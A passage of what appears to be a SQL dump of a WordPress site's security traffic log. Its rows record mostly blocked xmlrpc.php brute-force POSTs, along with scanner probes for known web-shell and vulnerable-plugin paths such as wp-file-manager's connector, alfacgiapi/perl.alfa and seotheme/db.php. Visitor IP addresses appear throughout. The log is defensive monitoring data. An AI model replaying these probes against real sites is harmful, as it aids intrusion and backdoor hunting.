Safari\\/537.36\"}','7vKp9NGaV06qxmcMPEl1RzH2',0,1679466781.8206,2067,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','YVMayr4Po5OstXfgAGH01hEv',0,1679466786.7693,442,'','POST',404,0,515,0,1,'',0),('80.88.87.187',1347966907,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','vbh2Qd5kDcMRHxNE7BXrqiyj',0,1679466789.5273,374,'','POST',404,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','YEBtinjkxWh69mMFJ5luZrVd',0,1679466803.6124,1569,'','POST',403,0,515,0,1,'',0),('159.65.72.143',2671855759,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','vTwoYWFGZhkz8Jc91eRUQjSA',0,1679466816.9312,2464,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Snd3cVxDtKaeTOu9LoUEY857',0,1679467013.1962,1809,'','POST',404,0,515,0,1,'',0),('1.117.83.240',24466416,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','aVUDExYrQkyBf9w64gIOKSjR',0,1679467012.8827,3899,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','mqVX3IO7gUApbSd1BWhLT06C',0,1679467015.4002,1385,'','POST',403,0,515,0,1,'',0),('195.201.202.58',3284781626,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','I9LDPrA0NvywfgmTBSikHjlU',0,1679467020.8822,655,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','feFRtPhsunx4YCoSIlqDKM60',0,1679467022.1148,392,'','POST',404,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','ail93pqkBzHCeKV7xN52F8Po',0,1679467027.4384,408,'','POST',404,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','SfFJU1t8NeBKZEO5v0qPsClM',0,1679467033.4026,630,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','bsNSQ2K7RC9cEAOWifqY3Lw4',0,1679467083.0787,1926,'','POST',404,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','3hcGYa0XMdsDx6NEkiV9oIPg',0,1679467113.8029,2307,'','POST',403,0,515,0,1,'',0),('138.36.236.53',2317675573,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','PaYjSUwhHTtZNrORLMA2G3b5',0,1679467128.9702,638,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/upload.php?page=imagify-bulk-optimization\"}','7b1UjI6TCMGSyJ4hKDHon5uO',0,1679495952.1448,1393,'','POST',400,0,500,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?interim-login=1&wp_lang=en_US\"}','V0myBXh7pk2iZ8TKJFNY15du',3,1679509379.8110,422,'','POST',200,0,600,0,1,'',510),('5.78.85.72',89019720,'','http://cmdev-site1.com/wp-content/plugins/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','jAxn4vywWQKcZCubIUEH7oGN',0,1679525105.1772,1467,'','GET',403,0,700,0,1,'',0),('5.78.85.72',89019720,'','http://cmdev-site1.com/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','YsGtwLjX1oJ9kHDaFSCmEIdl',0,1679525108.8923,631,'','GET',403,0,700,0,1,'',0),('5.78.85.72',89019720,'','http://cmdev-site1.com/wp-content/plugins/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','QkKgIzOads28b6lCFi4MevrB',0,1679525111.0110,342,'','GET',403,0,700,0,1,'',0),('5.78.85.72',89019720,'','http://cmdev-site1.com/wp-content/themes/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','rz3Qw4tNUEVC5gAjWJ1KyMbq',0,1679525113.5295,337,'','GET',403,0,700,0,1,'',0),('60.245.60.102',1022704742,'','http://cmdev-site1.com/wp-admin/js/index.php?of=1&a=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','OoLe2FRmnDdt0SZfupE4yqUP',0,1679593666.6178,1836,'','GET',403,0,700,0,1,'',0),('60.245.60.102',1022704742,'','http://cmdev-site1.com/wp-admin/css/css/index.php?of=1&a=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','MLGJaPhjC2ZVtpQSBWkylU0e',0,1679593686.3890,284,'','GET',403,0,700,0,1,'',0),('60.245.60.102',1022704742,'','http://cmdev-site1.com/wp-admin/js/js/index.php?of=1&a=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','fRyjBJo0AaHQ6XSDKp3iO41d',0,1679593737.3084,385,'','GET',403,0,700,0,1,'',0),('60.245.60.102',1022704742,'','http://cmdev-site1.com/wp-admin/js/js/js/index.php?of=1&a=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','37D9qnSxy4FIAjdfkNutCga1',0,1679593750.8965,345,'','GET',403,0,700,0,1,'',0),('60.245.60.102',1022704742,'','http://cmdev-site1.com/wp-admin/css/css/css/index.php?of=1&a=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','XIuQbrt09l5CSU3K14sBi6ov',0,1679593803.5067,1199,'','GET',403,0,700,0,1,'',0),('147.78.47.249',2471374841,'','http://cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','W3KfzUmShiBq1YxRFe8lCODj',0,1679599063.5593,290,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/js/_system/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','3qymzQlxNBcCSJM57fHseOo9',0,1679603298.6277,1648,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','S4yLZucfsAFpMOnaYT92wI6P',0,1679706459.3701,1686,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2oDqHAPUZQCcnSINdRJ1xWO4',0,1679706459.3702,1686,'','POST',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7DHBQKLTnhZop4NOEfibJ2Fg',0,1679706462.2773,2261,'','POST',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','iDnjIku8LC34rASzmhxq9gTU',0,1679706462.2834,2283,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','kDTiS5HJ8jecY1hZ7OIVEW0a',0,1679706463.9474,1392,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1ig0qeXNVvHmj8DOGkYpPh4Z',0,1679706464.4465,1207,'','POST',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Hqu0ic8kPReAXTKaFDZtEB72',0,1679706465.7489,562,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','SkUMPhTrFR4p8zitIX7D1Ve3',0,1679706466.5640,878,'','GET',403,0,700,0,1,'',0),('108.61.203.71',1815989063,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','6UoikIBOp9ADqbh3RmtSdKZg',0,1679706467.8408,731,'','GET',403,0,700,0,1,'',0),('185.233.237.135',3119115655,'','http://cmdev-site1.com/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','Yr0uOgy9QICj4tVnG1z7M6hB',0,1679735105.1775,1602,'','GET',403,0,700,0,1,'',0),('185.233.237.135',3119115655,'','http://cmdev-site1.com/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0.1 Mobile\\/15E148 Safari\\/604.1\"}','7ucpHFTOmZqsYgEG6ztyBCPD',0,1679735105.1841,1595,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','pIRO4tmY2sHWkXZbrqNJzSy1',0,1679740303.2998,319,'','GET',403,0,700,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','KOHFedEvxpqrXuzbTVhJaD28',0,1679752002.8759,2485,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','HOuaKh7fM51kN0gtbPs9E4ld',0,1679752002.2927,4191,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ZhRfL29mIlOsTFKW3uaAdJpQ',0,1679752004.4972,2042,'','POST',403,0,515,0,1,'',0),('69.174.53.190',1169044926,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','j5WyP7NeCGdAhaxSckOVF9p1',0,1679752014.8565,1613,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','duPvTz2Me1jr9WFYlUwVHanq',0,1679752015.0631,1679,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','SXUDMdtiqgnawkWxZJp240oI',0,1679752015.9653,1127,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','MZ5kUFHlAvrPjKgzWDOb0RcB',0,1679752019.7626,537,'','POST',403,0,515,0,1,'',0),('68.178.244.46',1152578606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','0V6SDFwW2RsH9g8Tnlm5LbQ7',0,1679752027.5642,540,'','POST',403,0,515,0,1,'',0),('82.165.86.170',1386567338,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','mI18H03hWsOQVYUcbdxXZNBv',0,1679752031.0909,609,'','POST',403,0,515,0,1,'',0),('45.64.25.22',759175446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','dgJqwaobXPhr8O3kuDsG64MT',0,1679752059.2436,544,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','2YDNrFcSvoAWwGPlhnOR4gM7',0,1679758406.1212,2717,'','POST',403,0,515,0,1,'',0),('160.153.146.149',2694419093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','k1OFPVNRxLe7gAq08blXsoHE',0,1679758399.9832,8867,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','SzIcGoH7ME9srWjgixu1nJ4C',0,1679758400.4188,9160,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','iLXoujhsE4BbtxZYQSg1Jqky',0,1679758997.4115,4546,'','POST',403,0,515,0,1,'',0),('37.97.170.79',627157583,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HIPrEdWGfyhYR14w6TcMC3UN',0,1679758997.8444,4113,'','POST',403,0,515,0,1,'',0),('185.182.56.34',3115726882,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','HStmN945xvREfIAsCBneLc1W',0,1679759001.1701,2205,'','POST',403,0,515,0,1,'',0),('188.166.86.232',3165017832,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','jrXeOu0UwycikmW2A7dC8IxK',0,1679759009.7342,588,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','IB9drJFbYhZXsSw1pTeWyACU',0,1679759011.6266,566,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2F&reauth=1\"}','QNHJmMVDIw2o5FlT1aKvWGsd',3,1679759715.0796,432,'','POST',302,0,600,0,1,'',510),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','VMsZfiFrzH4IkxDUvSRKa2bq',0,1679762571.0292,2466,'','POST',403,0,515,0,1,'',0),('108.170.11.130',1823083394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','4zTgQZleJM89jaqW6iYtCbnO',0,1679762571.5902,2162,'','POST',403,0,515,0,1,'',0),('89.163.140.92',1503890524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','P40ZJtD8cB63wobrSdmylUqx',0,1679762569.7004,4600,'','POST',403,0,515,0,1,'',0),('69.174.53.190',1169044926,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','bt8WQrkgBSp4CZUT3NHl7MDc',0,1679762583.0308,606,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','TndoKzaeSfMicyZjHLC2kp4O',0,1679762585.1630,613,'','POST',403,0,515,0,1,'',0),('103.153.68.100',1738097764,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','CiKUgjsH8vMnPJNZwAGmFhuf',0,1679762594.5290,855,'','POST',403,0,515,0,1,'',0),('68.178.145.9',1152553225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','QiXLtuJOc2BM1H5W6aeTZsfA',0,1679762595.0802,801,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ct3Pm8dLWgliCFkDZoTXBb2N',0,1679762604.7712,644,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','lzBXaf4bH6pLUT5r7OWEyY32',0,1679762613.7920,576,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','KbQ3cnZiLxOwYDMr2pHeoV1P',0,1679762622.3209,573,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','YMnFjCcglSeV2H3rEiRTvGDA',0,1679767007.4766,808,'','POST',403,0,515,0,1,'',0),('162.0.232.117',2717968501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','YqjLNBpFPm6C2deO9zEgIkKt',0,1679767011.7191,814,'','POST',403,0,515,0,1,'',0),('195.69.187.24',3276127000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','1SECdTigkhPR360Qmob95GrU',0,1679767023.1355,544,'','POST',403,0,515,0,1,'',0),('82.165.85.137',1386567049,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','oSbhe5D4cWImdJMxvNEBGYZi',0,1679767028.3990,615,'','POST',403,0,515,0,1,'',0),('49.234.23.207',837425103,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','NlpMjcedHA8O6nuZvCI41Eak',0,1679767031.3336,563,'','POST',403,0,515,0,1,'',0),('185.182.56.34',3115726882,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JoZsLbFOxIXjn8K315GgAmVc',0,1679767039.8241,571,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','TgoHEVle7J9FWSOP1LsfZnmp',0,1679767053.9950,597,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','znOagvCmMkJRbGX8f4UKi1pN',0,1679767056.0498,558,'','POST',403,0,515,0,1,'',0),('68.178.193.183',1152565687,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','lnMF1iDhLZozRV3djHaPAJO5',0,1679771322.5537,4542,'','POST',403,0,515,0,1,'',0),('103.3.246.205',1728313037,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','mecXWUdQLBy9PRgCDq13hHVJ',0,1679771331.3029,2900,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 